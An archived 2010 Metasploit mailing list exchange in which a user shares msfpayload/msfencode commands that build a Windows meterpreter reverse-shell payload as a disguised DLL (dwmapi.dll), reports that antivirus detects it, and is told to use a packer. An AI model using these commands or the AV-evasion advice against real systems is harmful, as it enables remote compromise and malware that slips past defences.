Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: msfencode and dlls

From: HD Moore <hdm () metasploit com>
Date: Mon, 06 Sep 2010 15:11:15 -0500
On 9/6/2010 3:04 PM, R0me0 *** wrote:

Hello everyone,

I tryed of the different forms encode meterpreter payload with msfencode
and output to dll

thus:

./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.10 lport=25
R | ./msfencode -c 5 -t dll > dwmapi.dll

and thus:

./msfpayload windows/exec CMD=custom.exe D > dwmapi.dll

the first don't work

the second works fine, but av detect it


Even if you encoded the payload in the first example, AV would still
likely detect it. Try using a packer.

-HD
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: